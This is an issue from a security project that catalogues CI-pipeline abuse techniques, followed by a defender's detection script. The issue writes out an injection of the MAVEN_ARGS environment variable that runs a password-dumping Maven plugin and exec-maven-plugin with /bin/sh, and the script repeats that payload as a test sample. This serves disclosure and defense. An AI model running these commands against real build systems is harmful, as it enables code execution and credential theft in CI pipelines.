boostsecurityio/lotp
Apache License 2.0

[LOTP] Update Maven #28

Open tr4l opened 5 months ago

tr4l commented 5 months ago

Description of the LOTP tool

MAVEN, you got it already.

ENV Configuration

Since version 3.9, MAVEN supports the MAVEN_ARGS env variable as a parameter. In addition to that, you can run (and download) any (approved) plugin without editing the pom.xml.

For instance

mvn ninja.stealing:maven-password:0.0.4:dump

Which means you can escalate an env injection to plugin injection, then RCE (let's see with exec-maven-plugin, as in your example):

export MAVEN_ARGS="org.codehaus.mojo:exec-maven-plugin:3.2.0:exec -Dexec.executable=/bin/sh"
mvn clean

Documentation

https://maven.apache.org/configure.html#maven_opts-environment-variable
https://github.com/tr4l/maven-password
https://www.mojohaus.org/exec-maven-plugin/exec-mojo.html

tr4l commented 5 months ago

Note: https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Maven.gitlab-ci.yml

You can achieve the same on GITLAB with an old version of maven by using the MAVEN_CLI_OPTS env.
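A defender-side check for the behaviour described in both comments above, added here as an example that is not part of the issue or of the lotp project: it scans a CI job's variables for MAVEN_ARGS or MAVEN_CLI_OPTS values that carry a plugin goal or exec-maven-plugin properties, which is where a pipeline should expect only flags. The variable names come from the issue; the sample environment is constructed.

```python
import re
import shlex

# Variables that mvn (>= 3.9, MAVEN_ARGS) or the GitLab Maven CI template
# (MAVEN_CLI_OPTS) splice into the command line without touching pom.xml.
MAVEN_ARG_VARS = ("MAVEN_ARGS", "MAVEN_CLI_OPTS")

# A goal token: prefix:goal, groupId:artifactId:goal or groupId:artifactId:version:goal.
GOAL_TOKEN = re.compile(r"^[\w.\-]+(?::[\w.\-]+){1,3}$")


def classify_token(tok):
    """Return (severity, reason) for one argument token, or None if it is benign."""
    if tok.startswith("-Dexec."):
        # Properties such as -Dexec.executable feed exec-maven-plugin directly.
        return ("high", "exec-maven-plugin property in CI variable")
    if tok.startswith("-"):
        return None  # ordinary flag or -Dkey=value property
    if GOAL_TOKEN.match(tok):
        parts = tok.split(":")
        if parts[0] == "exec" or "exec-maven-plugin" in parts:
            return ("high", "exec-maven-plugin goal injected via CI variable")
        return ("review", "plugin goal supplied via CI variable rather than pipeline config")
    return None


def audit_maven_env(env):
    """Scan a CI job's variables; return findings as (variable, token, severity, reason)."""
    findings = []
    for var in MAVEN_ARG_VARS:
        value = env.get(var)
        if not value:
            continue
        for tok in shlex.split(value):
            hit = classify_token(tok)
            if hit:
                findings.append((var, tok) + hit)
    return findings


# Constructed sample: a job whose MAVEN_ARGS was set to the payload quoted in the issue.
SAMPLE_ENV = {
    "MAVEN_ARGS": "org.codehaus.mojo:exec-maven-plugin:3.2.0:exec -Dexec.executable=/bin/sh",
    "MAVEN_CLI_OPTS": "--batch-mode -s .m2/settings.xml",
}

if __name__ == "__main__":
    for finding in audit_maven_env(SAMPLE_ENV):
        print(*finding)
```

Run it against the variables of each job before `mvn` is invoked, or offline against exported CI variable lists; any `high` finding means the build command is no longer the one the pipeline definition describes.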